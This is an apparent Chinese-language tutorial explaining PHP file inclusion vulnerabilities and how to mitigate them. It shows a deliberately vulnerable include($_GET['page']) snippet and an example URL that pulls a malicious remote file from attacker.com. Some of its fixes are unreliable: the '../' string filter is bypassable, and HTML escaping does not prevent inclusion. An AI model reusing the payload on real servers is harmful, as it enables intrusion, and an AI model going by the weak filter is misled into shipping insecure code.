PHP Include CTF - 探究 PHP 包含漏洞 PHP 作為一個廣泛使用的開源 Web 開發語言，因其簡潔、高效、可擴展性強而受到眾多開發者的喜歡。在 PHP 的開發過程中，我們常常會使用 include 函數來引入其他 PHP 文件中的函數、類或變量。但是，這也為惡意攻擊者留下了一個安全隱患 - PHP 包含漏洞。 什么是 PHP 包含漏洞？ PHP 包含漏洞是指，通過 PHP 的 include 函數引入惡意攻擊者構造的惡意文件，導致系統漏洞被攻擊者利用，從而實現攻擊目的。攻擊者通常會利用這個漏洞來獲取敏感信息、獲得系統權限或者執行惡意代碼。 舉個例子，假設我們有一個包含文件的 PHP 程序，如下所示：

<?php 
include($_GET[‘page’]);
?>

該腳本的作用是引入 GET 請求中指定的文件。然而，攻擊者可以構造一個 URL 如下： http://example.com/index.php?page=http://attacker.com/malicious 通過這樣的方式，攻擊者可以把惡意文件（如木馬腳本）加載到服務器上，并執行其中的指令，從而獲取系統權限、竊取敏感信息等。 如何防范 PHP 包含漏洞？ 為了防范包含漏洞，我們需要采取以下措施： 1. 自動轉義用戶輸入的數據 將用戶輸入的數據進行自動轉義可以減少攻擊漏洞的可能性。PHP 中有一些函數可以用于轉義用戶輸入的數據，例如 addslashes()、htmlentities() 等。在引入文件時，也應該判斷路徑是否在許可范圍內，避免加載任意文件。 下面是一個帶有自動轉義功能的 PHP 腳本：

<?php 
$page = $_GET[“page”];
$page = str_replace(“../”, “”, $page);
include(“./pages/” . $page . “.php”);
?>

上述代碼可以過濾掉攻擊者惡意輸入中的 ../，從而避免文件被加載到不被允許的路徑下。 2. 設置 allow_url_include 為 false 在 PHP 配置文件中，設置 allow_url_include 為 false，可以避免攻擊者通過 URL 直接引用惡意文件。如果系統中有很多 PHP 文件需要引用，可以設置 PHP 系統級變量 open_basedir，只允許 PHP 引用指定路徑下的文件。 3. 使用 PHP 框架 使用 PHP 框架可以幫助我們避免一些常見的安全漏洞，包括包含漏洞。框架通常會對用戶輸入的數據進行安全過濾和轉義，從而降低了漏洞發生的可能性。 結論 PHP 包含漏洞是一個常見的安全隱患，攻擊者可以通過構造惡意輸入來獲取系統權限或竊取敏感信息。為了防范包含漏洞，我們可以使用自動轉義或 PHP 框架等方法來降低漏洞發生的可能性。